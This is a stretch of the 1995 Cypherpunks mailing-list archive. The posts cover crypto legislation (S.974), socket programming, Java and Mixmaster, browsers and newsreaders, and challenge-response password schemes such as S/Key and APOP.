tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From rross at sci.dixie.edu Fri Jul 21 14:48:59 1995 From: rross at sci.dixie.edu (Russell Ross) Date: Fri, 21 Jul 95 14:48:59 PDT Subject: Problem synchronizing sockets... Message-ID: > I'm a newbie at socket programming so this is probably going to >be an easy question (I hope). I've been developing a client/server >project using SSLeay and I'm having problem synchronizing my messages. >More specifically, I use a combination of SSL_read and SSL_write to >exchange messages bix my client and server. The problem is that my >client is reading (SSL_read) before the server is done writing and reads >an empty buffer. This does not occur all the time but often enough to >make things quite unreliable... I've tryed using the select() command >but that doesn't solve it. Help..... > > Andre This is generally true of sockets programming. You don't know that you'll get as many bytes as you request. The simplest solution is to loop your read calls until you get what you need. See BSD Sockets: A Quick & Dirty Primer for a sample solution. The URL is http://www.ntua.gr/unix/sockets.html ----------------------------------------------------------- Russell Ross email: rross at sci.dixie.edu 1260 N 1280 W voice: (801)628-8146 St. George, UT 84770-4953 From lmccarth at cs.umass.edu Fri Jul 21 15:05:11 1995 From: lmccarth at cs.umass.edu (L. McCarthy) Date: Fri, 21 Jul 95 15:05:11 PDT Subject: Why no action alert, coalition opposing S. 974? In-Reply-To: <300f5b5a.flight@flight.hrnowl.lonestar.org> Message-ID: <9507212204.AA16780@cs.umass.edu> Paul Elliott writes: > The best time to persuade these "experts" > will be before they make any public statements about the bill in the > subcommittee hearings and their positions are locked by pride not > wanting to publicly change their positions. Thus we should be contacting > these people now, and we may have a chance to nip SB 974 in the bud. Sen. Kyl (Arizona) became a co-sponsor of S.974 yesterday (7/20/95). He, at least, appears to believe the bill is still heading somewhere. (Ref: Congressional Record, pg. S10427) -Futplex From adwestro at ouray.cudenver.edu Fri Jul 21 15:05:27 1995 From: adwestro at ouray.cudenver.edu (Alan Westrope) Date: Fri, 21 Jul 95 15:05:27 PDT Subject: Why no action alert, coalition opposing S. 974? In-Reply-To: <300f5b5a.flight@flight.hrnowl.lonestar.org> Message-ID: <7pBEwkkAs2IH084yn@ouray.cudenver.edu> -----BEGIN PGP SIGNED MESSAGE----- On Fri, 21 Jul 95 8:46:26 -0600, Paul Elliott wrote: > Many of the leaders of the major net civil liberties organizations have made > statements concerning SB 974. They seem to agree that no action alert > or coalition on SB 974 should be formed at this time. [...] > I remain concerned about this bill and am not satisfied with the response > to this bill. Your points are well taken, but I'm still in favor of concentrating on the Exon bill until such time as SB 974 shows any signs of support from other politicians. Both bills are preposterous, of course: unconstitutional and unenforceable. There's one particularly absurd aspect to SB 974 that I haven't seen mentioned on the Cypherpunks list, possibly because it goes without saying. I'll say it anyway, first quoting the relevant portion of the bill: `Sec. 1030A. Racketeering-related crimes involving computers `(a) It shall be unlawful [...(1) snipped -- ADW] `(2) to distribute computer software that encodes or encrypts electronic or digital communications to computer networks that the person distributing the software knows or reasonably should know, is accessible to foreign nationals [...] One area where the U.S. has retained strong international competitiveness is its colleges and universities. The number of these institutions that have no foreign nationals enrolled is *damn* small, and largely comprises "Ace's Truck Driving College" and the like. Foreign nationals who are in this country to attend college are exempt from the usual I-9 employment restrictions; hence, many are also employed at full-time summer jobs, internships (in government or the private sector), teaching assistantships, or work-study positions, which may involve access to computer networks. (Many foreign nationals complete medical residencies in U.S. hospitals, for example.) Preventing these people from having access to crypto software is simply impossible. This bill would make criminals out of thousands of network administrators and MIS types, simply for having crypt() or Norton Diskreet around. If the bill gains any momentum whatsoever, I expect howls of protest from the academic world. I'm not sure a megabuck lobbying effort by private industry will be necessary: letters from Computing Services honchos at some prestigious schools/hospitals/corporations should induce even the most technically clueless congressdroids to pull their heads out of their asses on this issue...(OK, maybe not Jamf-^H^Hes Exon, but enough of 'em to prevent the bill's passage.) Anyway, I'm glad nobody's suggested a Cypherpunk SB 974 infomercial, financed "by each according to his ability to pay," as happened during the Clipper debate...maybe the list *is* evolving...:-) OK, back to your regularly scheduled Trans- and Cross-Continental Realtime Virtual Kneecapping & Interface Flamefest, a perennial Cypherpunk favorite! Alan Westrope __________/|-, (_) \|-' 2.6.2 public key: finger / servers PGP 0xB8359639: D6 89 74 03 77 C8 2D 43 7C CA 6D 57 29 25 69 23 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMBAh3FRRFMq4NZY5AQGDswP+KwtgTTnZszFOsHAUIqM/UEftkBLmnKJs kyFnhnqyYk+Oe2CS7pqjrV36O3XqvnFvJx6RzPdCgcR1J97ytjP7izACLoYHSjVR Fzsedf5SxynppZqAlTMz1dWozyO28F0RcTvmPG+Aid0EtXOgdii90MCH93Z7XC4o iViIX46al84= =519b -----END PGP SIGNATURE----- From koontz at MasPar.COM Fri Jul 21 15:21:22 1995 From: koontz at MasPar.COM (David G. Koontz) Date: Fri, 21 Jul 95 15:21:22 PDT Subject: New Form of DOS Attack Message-ID: <9507212224.AA05214@argosy.MasPar.COM> >If you want to deny the Feds the opportunity for some energetic service of proc>ess >all you have to do is hire Rodney King to move in. Once he is onsite, the Feds >will be helpless. Just keep your Greenpeace Special (tm) sat cams focussed >on old Rodney and you have absolute immunity from all incursion. Err, hasn't he just been indicted again? From vznuri at netcom.com Fri Jul 21 15:24:34 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Fri, 21 Jul 95 15:24:34 PDT Subject: science foundation interested in anonymity Message-ID: <199507212210.PAA15177@netcom21.netcom.com> A mindblowing opportunity to promote the cypherpunk ideal of anonymity in a highly reputable and influential context recently dropped into the lap of a friend of mine. This close friend of mine got an inquiry from an extremely prestigious science foundation into the possibility of studying anonymity in cyberspace. It is an entirely embryonic stage right now, but a director at this association is interested in commissioning papers, interviewing subjects, having focus groups, perhaps even organizing a conference on the subject, particularly the "social, legal, and technical" angles. This may have major impact in the various and sundry studies influencing future policy on the "information highway". If you can forward me some leads, I would appreciate it greatly, and I will get you in touch with this key person. At this point the contact is at an idea stage and probably would benefit greatly from talking to organizers of similar endeavors. Also this project would involve fundraising for the cost of the studies, so anyone you might know with an interest in sponsoring this kind of endeavor (particular corporations, although that would be a bit paradoxical I admit), please send me email. For example, if someone could get me the name/phone/email address of whoever chaired that panel on Anonymity a few years ago at the Conference on Freedom and Privacy (Helsingius and Gilmore were panelists), I would greatly appreciate it. many thanks-- ~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^ \ / ~/ |\| | | |> | : : : : : : Vladimir Z. Nuri : : : : \/ ./_.| | \_/ |\ | : : : : : : ftp://ftp.netcom.com/pub/vz/vznuri/home.html From andrew_loewenstern at il.us.swissbank.com Fri Jul 21 16:18:35 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Fri, 21 Jul 95 16:18:35 PDT Subject: The OS wars and DOOM... Message-ID: <9507212317.AA01248@ch1d157nwk> > Apps have migrated from Unix to the Mac and the PC before in the > past. In the further past, this has included curses and > other-types-of-text-control packages such as PC versions of Emacs > and nethack and the like. > Of course, this was not done with graphical programs; everyone > knows that graphics isn't Unix's strong suit, and what it has is > so different from the PC, etc., blah, blah,... > Except that for the past two or three years, it's been WRONG. > One of the hottest games on the PC, DOOM, was originally written > in Nextstep (a Unix variant, and a ghetto even amidst the "ghetto" > of Unix) and then ported to the PC. Being a resident of the NeXTSTEP ghetto, please allow me to chime in. While Doom is written on NeXTSTEP boxes, that's about all the game itself has in common with it. The game is carefully written in strict ANSI-C and any portions that must be OS specific are separate. They have a VGA emulator that allows them to run Doom on non-DOS boxes. All of the platform independance comes from the discipline of the developers (who are extremely talented, IMHO). In contrast, Lotus Improv was NeXT native and had to be completely rewritten over a period of at least 3 years to get it to work on Windoze. The primary reason Id software (and Trilobyte among others) uses NeXTSTEP (over DOS or any other unix environment) is because it lets them write in-house tools like map and monster editors really fast (and really slick too!). On any other platform it would take much more time and effort to write the tools and they probably wouldn't be as nice either. Since these tools aren't being sold to customers, it doesn't matter that they only run on a dead-end niche software platform that costs $1000 per user (and $5k per developer!!). This strategy makes sense for a commercial video game where there is the opportunity to save major amounts of time and effort through the use of custom tools (and the incentive of major amounts of cash if it is successful). However, this strategy definitely doesn't make sense when you are talking about a cypherpunk donating their spare time to write a freeware (or copyleft) crypto app. Better would be to just write the app for the target platform or write it using an environment that is designed to be platform independant (like Java). andrew ...able to work cypherpunks relevance into virtually any thread......and uses Python instead of NeXTSTEP when writing stuff that needs to be platform-independant... From usura at replay.com Fri Jul 21 17:23:47 1995 From: usura at replay.com (Alex de Joode) Date: Fri, 21 Jul 95 17:23:47 PDT Subject: Phrack SummerCon - I enjoyed your talk Message-ID: <199507220001.AA27218@xs1.xs4all.nl> Owen Lynn sez: : Eric, : I was there in 'lanta when you gave your talk at SummerCon, and I : thoroughly enjoyed it. I was especially intrigued by some of the, um, : fun you can have with corporations. Are there any books I can read : that are sort of _Fun with Your Corporation for Beginners_? Corporation as in a Delaware "Inc" ? Are there transcripts of the speach available ? -- /ME kewl as fuck ! From erc at khijol.intele.net Fri Jul 21 18:04:27 1995 From: erc at khijol.intele.net (Ed Carp [khijol Sysadmin]) Date: Fri, 21 Jul 95 18:04:27 PDT Subject: Louie Freeh In-Reply-To: Message-ID: On Fri, 21 Jul 1995, Jon Lasser wrote: > Having experience using American Spectator as a source for research > papers, I can state without any doubt in my mind that anything I read in > AS I attempt to find proof of their claims somewhere else. That's a good policy, regardless of the source. Respectable journalists just don't trust only one source - they find collboration from good, reliable sources. Too bad most journalists have no idea what "respectable" and "professional" mean anymore. -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 801/534-8857 voicemail 801/460-1883 digital pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi Q. What's the trouble with writing an MS-DOS program to emulate Clinton? A. Figuring out what to do with the other 639K of memory. From usura at replay.com Fri Jul 21 18:04:32 1995 From: usura at replay.com (Alex de Joode) Date: Fri, 21 Jul 95 18:04:32 PDT Subject: big word listing Message-ID: <199507220006.AA27598@xs1.xs4all.nl> Jim Gillogly sez: : Also you should be aware that cracking passwords is passe' these days: : it's much easier to run an ethernet sniffer and gather them wholesale. : Every little bit helps, though. Is there a "challenge response" type of password/login available somewhere ? -- /ME kewl as fuck ! From erc at khijol.intele.net Fri Jul 21 18:05:06 1995 From: erc at khijol.intele.net (Ed Carp [khijol Sysadmin]) Date: Fri, 21 Jul 95 18:05:06 PDT Subject: Java (was Netscape: the big win) In-Reply-To: <9507212034.AA00995@ch1d157nwk> Message-ID: On Fri, 21 Jul 1995, Andrew Loewenstern wrote: > If a Mixmaster client were available in Java (and I'm pretty sure it can be > done) then suddenly everyone who previously could only use the penet server > can now also use Mixmaster. With more people using the remailer network, all > of them with Java clients, the possibility of for-pay remailers could become > reality (no promises that you'll get rich though). The problem, Java only runs on a pretty restricted set of software. I don't have to be running Solaris to take advantage of penet. -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 801/534-8857 voicemail 801/460-1883 digital pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi Q. What's the trouble with writing an MS-DOS program to emulate Clinton? A. Figuring out what to do with the other 639K of memory. From frogfarm at yakko.cs.wmich.edu Fri Jul 21 18:42:27 1995 From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) Date: Fri, 21 Jul 95 18:42:27 PDT Subject: Netscape the Big Win(dows) In-Reply-To: <199507211829.OAA08315@bb.hks.net> Message-ID: <199507220147.VAA13565@yakko.cs.wmich.edu> Lucky Green writes: > I remeber writing here once that after someone tries surfing the Web with > Mosaic, there is no going back to just using lynx. The same holds true for > Anarchie, Newswatcher, Eudora -- and Netscape. Au contraire. I finally got the chance to use Netscape, and although I AM impressed, I still prefer Lynx. Most folks will probably call this pointless stubborness, elitism, I don't care. Graphics are too damn slow at any speed and personally, I have no need (or desire) to have my net connection slow to a snail's crawl just to make it "look nicer". Text mode looks just fine to me. It's the content that matters. -- http://yakko.cs.wmich.edu/~frogfarm | PGP signed mail preferred "On a superhighway existing roads are destroyed, it's easy to monitor traffic, you can't make your on-ramp, politics controls development and they arrest you if you go too fast, travel in your own direction or use unapproved technology." - kpc at ptolemy.arc.nasa.gov | Freedom...yeah, right. From lmccarth at cs.umass.edu Fri Jul 21 19:05:17 1995 From: lmccarth at cs.umass.edu (L. McCarthy) Date: Fri, 21 Jul 95 19:05:17 PDT Subject: Java (was Netscape: the big win) In-Reply-To: Message-ID: <9507220205.AA19644@cs.umass.edu> [I've cc:ed this to the Mixmaster development list --Futplex] Andrew Loewenstern writes: > If a Mixmaster client were available in Java (and I'm pretty sure it can be > done) then suddenly everyone who previously could only use the penet server > can now also use Mixmaster. With more people using the remailer network, > all of them with Java clients, the possibility of for-pay remailers could > become reality (no promises that you'll get rich though). Ed Carp writes: # The problem, Java only runs on a pretty restricted set of software. I # don't have to be running Solaris to take advantage of penet. True, but an important part of the promise of Java is that many people are AFAIK actively working on porting it to most major platforms. Right now it apparently runs only on Solaris 2.3+ and Win NT 3.5. However, Sun is working on porting it to Win `95 and Mac System 7.5. I assume other people are trying to port it to other Unices. I recognize that this is RSN again, but I believe there is reason for optimism in this case. I'm getting extremely interested in porting the Mixmaster client to Java. Doug Barnes' enthusiasm at the last BA phys. mtg. has proven infectious, with a delayed reaction in my case ;). I plan to say more about this notion on mix-l within the next few days. -Futplex From bigdaddy at ccnet.com Fri Jul 21 19:17:22 1995 From: bigdaddy at ccnet.com (bigdaddy at ccnet.com) Date: Fri, 21 Jul 95 19:17:22 PDT Subject: Netscape the Big Win(dows) In-Reply-To: <199507211829.OAA08315@bb.hks.net> Message-ID: On Fri, 21 Jul 1995, Lucky Green wrote: > Once someone tries Anarchie for ftp, or one of the enhanced (current > leader seems to be Y.A.) Newswatchers for USENET, there is no going back > to just Netscape. In my own experience, the Mac newsreaders that I have tried(mainly Nuntius and Newswatcher) have felt incredibly slow compared to tin. What, IMHO, would be a good step forward would be Mac versions of UNIX packages like pine and tin...preferably with AppleScripts that implement the same functionality as the PineSign and TinSign scripts recently distributed here. I don't know about the Netscape-addicted masses, but it would make my life a lot easier. :-) David Molnar From shamrock at netcom.com Fri Jul 21 19:47:42 1995 From: shamrock at netcom.com (Lucky Green) Date: Fri, 21 Jul 95 19:47:42 PDT Subject: Netscape the Big Win(dows) Message-ID: At 21:47 7/21/95, Damaged Justice wrote: >Au contraire. I finally got the chance to use Netscape, and although I AM >impressed, I still prefer Lynx. Most folks will probably call this pointless >stubborness, elitism, I don't care. Graphics are too damn slow at any >speed and personally, I have no need (or desire) to have my net connection >slow to a snail's crawl just to make it "look nicer". Ever tried turining off "autoload immages"? -- Lucky Green PGP encrypted mail preferred. From shamrock at netcom.com Fri Jul 21 19:47:47 1995 From: shamrock at netcom.com (Lucky Green) Date: Fri, 21 Jul 95 19:47:47 PDT Subject: Netscape the Big Win(dows) Message-ID: At 19:15 7/21/95, bigdaddy at ccnet.com wrote: > In my own experience, the Mac newsreaders that I have >tried(mainly Nuntius and Newswatcher) have felt incredibly slow compared >to tin. Depends on the load on the host, the speed of your link, the speed of your Mac, and if you want to trade features for speed at that given moment. >What, IMHO, would be a good step forward would be Mac versions of >UNIX packages like pine and tin... The human interface is the whole point behind Newswatcher and Nuntius. As for Mac users that prefer tin, they already have an implementation available. It is called telnet. >preferably with AppleScripts that >implement the same functionality as the PineSign and TinSign scripts >recently distributed here. I have been thinking about writing AppleScripts that link Newswatcher with PGP. Unfortunately, there is another project that has precedence. Still, as with most great utility software not yet available, you can always try to write it yourself. Have fun, -- Lucky Green PGP encrypted mail preferred. From bailey at computek.net Fri Jul 21 19:53:07 1995 From: bailey at computek.net (Mike Bailey) Date: Fri, 21 Jul 95 19:53:07 PDT Subject: Netscape the Big Win(dows) In-Reply-To: <199507220147.VAA13565@yakko.cs.wmich.edu> Message-ID: On Fri, 21 Jul 1995, Damaged Justice wrote: > Lucky Green writes: > > > I remeber writing here once that after someone tries surfing the Web with > > Mosaic, there is no going back to just using lynx. The same holds true for > > Anarchie, Newswatcher, Eudora -- and Netscape. > > Au contraire. I finally got the chance to use Netscape, and although I AM > impressed, I still prefer Lynx. Most folks will probably call this pointless > stubborness, elitism, I don't care. Graphics are too damn slow at any > speed and personally, I have no need (or desire) to have my net connection > slow to a snail's crawl just to make it "look nicer". > > Text mode looks just fine to me. It's the content that matters. Ever heard the old adage "a picture is worth a thousand words" 8-) -Mike ************************************************************************** * Mike Bailey (hm)214-252-3915 * * AT&T Capital Corporation. (wk)214-456-4510 * * email bailey at computek.net host bambam.computek.net * * "Remember you can tune a piano but you can't tuna fish -Joe Walsh" * * http://www.computek.net/public/bailey * ************************************************************************** From adam at bwh.harvard.edu Fri Jul 21 20:02:16 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Fri, 21 Jul 95 20:02:16 PDT Subject: big word listing In-Reply-To: <199507220006.AA27598@xs1.xs4all.nl> Message-ID: <199507220301.XAA28535@bwh.harvard.edu> | Is there a "challenge response" type of password/login available | somewhere ? Theres S/Key, (also called OPIE), OTP from Avi Rubin at Bellcore, and I think one or two others. There are also hardware solutions, sold by ANS, DEC, and others. If you want real in depth answers, try firewalls. (majordomo at greatcircle.com) Adam -- "It is seldom that liberty I Support The Phil of any kind is lost all at Zimmermann legal defense fund once." -Hume http://www.netresponse.com/zldf ------------------ PGP.ZIP Part [001/713] ------------------- M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X M\9M!$E8,TT at PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W ------------------------------------------------------------- for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ From jgrasty at gate.net Fri Jul 21 20:11:28 1995 From: jgrasty at gate.net (Joey Grasty) Date: Fri, 21 Jul 95 20:11:28 PDT Subject: big word listing Message-ID: <199507220309.XAA22246@tequesta.gate.net> Alex sez: > Is there a "challenge response" type of password/login available > somewhere ? > Post Office Protocol 3 (POP3) has an optional command called APOP which sends a string of the form "". The POP3 client calculates the MD5 digest of password and sends it to the server as "APOP username 58349485whatever89583449". I like it. Regards, -- Joey Grasty jgrasty at gate.net [home -- encryption, privacy, RKBA and other hopeless causes] jgrasty at pts.mot.com [work -- designing pagers] "Anyone who considers arithmetical methods of producing random digits is, of course, in a state of sin." -- John Von Neumann From stewarts at ix.netcom.com Fri Jul 21 20:26:55 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 21 Jul 95 20:26:55 PDT Subject: big word listing Message-ID: <199507220323.UAA04489@ix7.ix.netcom.com> At 04:17 PM 7/21/95 -0500, Chris Gorsuch wrote: [ stuff about keeping a dictionary of previously used passwords to prevent reuse ] > A "cryptographic" solution would be to simply store a hash of the password >rather than the password itself in the "appended" dictionary. A CRYPTOGRAPHIC >solution would be to use one time passwords :). Be _very_ careful if you try this. After all, it's an invitation for anybody who runs the dictionary to use a crack program on the convenient list of hashes. (If you use the same hash as the password file, you haven't risked _too_ much, but using something fast like MD5 invites people to use their pre-computed "MD5's of a million wimpy passwords" list. #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- # Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/ M0V]N9W)E2!T;R!A Message-ID: <30106384.flight@flight.hrnowl.lonestar.org> > > We've not "bowed out" on this bill, it's just not significant enough a > threat (yet) to warrant stirring up a lot of activism about it - which > would detract from the focus on the CDA and it's clones. > > We'll be tracking this bill and will certain help form a campaign against > it if it looks to be going anywhere. In the mean time, we're issuing an > analysis of it, and will keep the net informed. > Sun Tzu in his classic _The Art of War_ says: "Therefore those who win every battle are not really skillful--those who render others armies helpless without fighting are the best of all. The superior militarist strikes while schemes are being laid. The next best is to attack alliances. The next best is to attack the army." "To unfailingly take what you attack, attack where there is no defense. For unfailingly secure defense, defend where there is no attack. So in the case of those who are skilled in attack, their opponents do not know where to defend. In the case of those skilled in the art of defense, their opponents do not know where to attack." "Be extremely subtle, even to the point of formlessness. Be extremely mysterious, even to the point of soundlessness. Thereby you can be the director of the opponent's fate. To advance irresistibly, push through their gaps. To retreat elusively, outspeed them." I am afraid that if those who favor network freedom to not apply Sun Tzu's principles we may be defeated. What are we doing to "attack while the schemes are being laid?" If we were to provoke opposition now in the beginning, it would create the impression that if the bill were to become a threat, then there would be furious opposition. We have a chance to win by indirection. But we are loosing it by inaction. Sun Tzu recommends the use of spies, but because the net civil liberties organizations are inactive, we are deprived of our spies. We do not even know which subcommittee it has been sent to. We do not know which Senators we should direct the pressure to. I am now making inquiries from here in Texas (through the offices of the Texas Senators) as to what subcommittee. But it may take a while. But this information should be easily available to organizations like EFF and VTW. It should be in an action alert so that people like me here in Texas do not have to search for it using non-optimal means. If anybody knows which subcommittee the bill has been sent to, please tell me. -- Paul Elliott Telephone: 1-713-781-4543 Paul.Elliott at hrnowl.lonestar.org Address: 3987 South Gessner #224 Houston Texas 77063 From rsalz at osf.org Fri Jul 21 21:16:47 1995 From: rsalz at osf.org (Rich Salz) Date: Fri, 21 Jul 95 21:16:47 PDT Subject: big word listing Message-ID: <9507220416.AA27159@sulphur.osf.org> >or set it as a variable and fork, or something like that. Berkely-derived unices have a "ps" that can print the environment. /r$ From shabbir at panix.com Fri Jul 21 21:51:48 1995 From: shabbir at panix.com (Shabbir J. Safdar) Date: Fri, 21 Jul 95 21:51:48 PDT Subject: Why no action alert, coalition opposing S. 974? In-Reply-To: <30106384.flight@flight.hrnowl.lonestar.org> Message-ID: <199507220451.AAA25935@panix4.panix.com> [From http://www.cnu.edu/~patrick/taoism/suntzu/suntx10.txt] Sun Tzu? SUN TZU you say? >5. The general, unable to control his irritation, > will launch his men to the assault like swarming ants, > with the result that one-third of his men are slain, > while the town still remains untaken. Such are the disastrous > effects of a siege. Let's not lay siege to this bill prematurely. Should we call grass roots supports too early, people will become aggravated with being asked to act on bills that aren't really a threat. > 6. Therefore the skillful leader subdues the enemy's > troops without any fighting; he captures their cities > without laying siege to them; he overthrows their kingdom > without lengthy operations in the field. Let's give the DC folks a chance to convince *those that control the Congressional schedule* to keep this bill from going anywhere. >17. Thus we may know that there are five essentials > for victory: > (1) He will win who knows when to fight and when > not to fight. Now is not the time to fight this with "call in campaigns". We haven't even had time to digest the analyses. Sure we understand the crypto part, but should we call Grassley's office, you'll probably get back, "but there are so many other holes in current law that this bill fixes, how can you be opposed to it?" Unaware of the rest of the bill, we'll be caught flat footed. Look, every net-civlib group in DC is committed to the availability of strong crypto. There isn't a one of them who has ever ignored a fight yet against crypto restrictions. If several of them (who have really good resources inside the capital, better than all of us) say that the bill is NOT going anywhere, and that the best thing to do right now is to study it and get ready in case it does move, what better information do you have that convinces you that they're wrong? We should read the bill, and we should be pissed. But calling the wrath of the net down on this bill is wasteful at this stage. Sure it may get thrown in as an amendment, that's always possible. But if that's Grassley's strategy, no amount of call-in support is going to help, because nobody, not even that Senator you just called who promised you s/he opposes AER will know what happened until it is too late. Let's read the bill and get ready for a fight. We should hold Grassley accountable for this next election. But we're spinning our wheels by acting against every bill that affects one of our issues. -Shabbir From cman at communities.com Fri Jul 21 22:29:51 1995 From: cman at communities.com (Douglas Barnes) Date: Fri, 21 Jul 95 22:29:51 PDT Subject: Free Java courses in CA Message-ID: [[ This is another reason why I think Java is worth looking into -- on one hand, there will always be free tools available, in addition to commercial tools; on the other hand, it is being strongly supported by SUN ]] The SUN Sacramento Training Center announces the following FREE courses. The Java Programming Series: #1 An Overview of the Java Language The Java Programming Series: #2 Accessing Data Files The Java Programming Series: #3 Simple GUI Applications The Java Programming Series: #4 Program-to-Program Communication The Java Programming Series: #5 Applets Design and Implementation The Java Programming Series: #6 Accessing an Oracle RDBMS Each course is: - 2 hours in length (they always start at 9:00 AM on Fridays) - fast paced - an introduction to the course topic - FREE It is assumed that each student: - knows C and/or C++ language syntax - has a basic understanding of object oriented programming - has a personality that enjoys taking a jump-start course and then learning the rest of the technology via projects, newsgroups, and email-alias discussions. You should NOT attend this class if: You are a techno-weenie. You are already an experienced JAVA programmer. Instructor: Matthew Calame -------------------------------------------------------------------- A DRESS CODE is REQUIRED of all students. Dress Code: Traditional Silicon Valley casual attire (blue jeans and company tee-shirt) -------------------------------------------------------------------- Current Schedule: 08/04/95 The Java Programming Series: #1 An Overview of the Java Language 08/18/95 The Java Programming Series: #2 Accessing Data Files 09/22/95 The Java Programming Series: #3 Simple GUI Applications 10/06/95 The Java Programming Series: #4 Program-to-Program Communication 10/20/95 The Java Programming Series: #5 Applets Design and Implementation 11/03/95 The Java Programming Series: #6 Accessing an Oracle RDBMS Note: If your group needs training at a different location or at different times, please contact matthew.calame at west.sun.com. -------------------------------------------------------------------- Courses will be held at: Sun Microsystems 8880 Cal Center Drive Suite 200 Sacramento, CA 95826 -------------------------------------------------------------------- To Enroll: (1) Send an email to: java-training at sacto.west.sun.com The email should contain your: Name: Company Name: Mailing Address: Telephone Number: Fax Number: Email Address: **OR** (2) Send a fax to: 916-362-3287 Attn: Matthew Calame The fax should contain your: Name: Company Name: Mailing Address: Telephone Number: Fax Number: Email Address: -------------------------------------------------------------------- Regards, Matt ---------------------------------------------------------------- Matthew B. Calame Systems Engineer Sun Microsystems Computer Corporation Phone: 916-856-5507 or 916-856-5500 Email: matthew.calame at West.Sun.COM Fax: 916-362-3287 Sun Mailstop: USAC02 Address: Sun Microsystems 8880 Cal Center Drive Suite 200 Sacramento, CA 95826 ---------------------------------------------------------------- - Note to Sun employees: this is an EXTERNAL mailing list! Info: send 'help' to java-interest-request at java.sun.com From hal9001 at panix.com Fri Jul 21 23:12:32 1995 From: hal9001 at panix.com (Robert A. Rosenberg) Date: Fri, 21 Jul 95 23:12:32 PDT Subject: It had to happen... Message-ID: At 12:45 7/21/95, David Lesher wrote: >Note that last I heard RM Sr. had retired & moved to New England. >He is an interesting ....character... for lack of a better word. I got that impression from the description in Cuckoo's Egg. From ruf at osiris.cs.uow.edu.au Sat Jul 22 00:42:42 1995 From: ruf at osiris.cs.uow.edu.au (Justin J. Lister) Date: Sat, 22 Jul 95 00:42:42 PDT Subject: Searching for reference Message-ID: I am trying to find some pointers to a recent UK finacial services report of the Foresight Program. It deals with fraud detection systems, an outline appeared in 'The Australian' 9th May 1995 - by Vanessa Houlder from Financial Times, London. Additionally any pointers to :- Jason Kingdon of SearchSpace. Barclay and Touche Ross (Mr Mark Tantum) - Fraud 2000 system. Visa International's - Cardholder Risk Identification System (CRIS) - Merchant Risk Identification System (MRIS) Cooper & Lybrand's (System Name?) - Using Netmap visualisation software (by Active Analysis) in conjunction with neural net & knowledge based system. Additionally any information in regard to such systems would be useful. TRW, Mastercard, etc.. So far have been unable to find any details via gopher, netfind searches and would like to avoid making international phone calls. -- +---------------------+--------------------------------------------------+ | ____ ___ | Justin Lister ruf at cs.uow.edu.au | | | \\ /\ __\ | Center for Computer Security Research | | | |) / \_/ / |_ | Dept. Computer Science voice: 61-42-214-327 | | | _ \\ /| _/ | University of Wollongong fax: 61-42-214-329 | | |_/ \/ \_/ |_| (tm) | Computer Security a utopian dream... | | | Disclaimer: dreaming is at own risk | +---------------------+--------------------------------------------------+ From craig at passport.ca Sat Jul 22 01:01:59 1995 From: craig at passport.ca (Craig Hubley) Date: Sat, 22 Jul 95 01:01:59 PDT Subject: Three strikes you're out! for politicians... yeah we wish! In-Reply-To: Message-ID: > > About two weeks ago, there was some talk in here with regards to holding > DC lawmakers crominally liable for passign bad laws. This was followed > up with postins pointing out that you can't do that. Here's something you *can* do: "Three strikes you're out" for politicians. Any time the Supreme Court strikes down a law, any politician who has been found to have voted in favor of three such laws is immediately stripped of all offices and rendered ineligible to run for public office ever again, at any level. (The same might apply to those found to have lied to a court A politician who would trade citizen rights for political gain must be denied the benefits of such a tradeoff. This might prevent the rise of demagogues. Term limits, etc., would of course help as well. It would also give those politicians who vote for 'motherhood' issues like 'protecting kids from the perverts on the Internet' a good reason to think twice about the real issue. If they REALLY believe they are protecting someone, they will still vote in favor. If they are going with the flow to avoid criticism, they'll lose in the end. My reasoning is that any politician whose laws are consistently struck down should be deemed to lack a fundamental understanding of the rights of the citizens of his/her country or jurisdiction. They are thus a poor guardian of those rights. You heard it here first. Craig Hubley From Andrew.Spring at ping.be Sat Jul 22 04:39:26 1995 From: Andrew.Spring at ping.be (Andrew Spring) Date: Sat, 22 Jul 95 04:39:26 PDT Subject: Something occured to me Message-ID: -----BEGIN PGP SIGNED MESSAGE----- > >Whent he republicans took over the congress, they instidtued that >Contract on America. One of the first laws that was passed (by both >parties, I might add) was a law that made lawmakers abide by the same >laws that "normal" people abide by. > I think this was aimed at congress's tendency to exempt themselves from their own legislation. For example, Congressmen are, supposedly, entitled to practice hiring discrimination based on, "race, creed, or color of socks" in the words of GB Trudeau's Lacey Davenport. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMBAYFY4k1+54BopBAQHxuwP+J/ypbLg07RE49Mvc/oXTl9RtPwTInEv7 t2RjOb57I2gvjr60i/OS/1EFVQv8FE7iZHtXpOEw7W2nHRTOBsWwTx6L9b7NB5Z9 ufkierYXyJnTJvXXvkrevXZ4wmc26Q5dyMU35HmMensRJSYwlR213DyvvKD5aOG1 6MtCqMomJZQ= =Wn55 -----END PGP SIGNATURE----- -- Thank you VERY much! You'll be getting a Handsome Simulfax Copy of your OWN words in the mail soon (and My Reply). PGP Print: 0529 C9AF 613E 9E49 378E 54CD E232 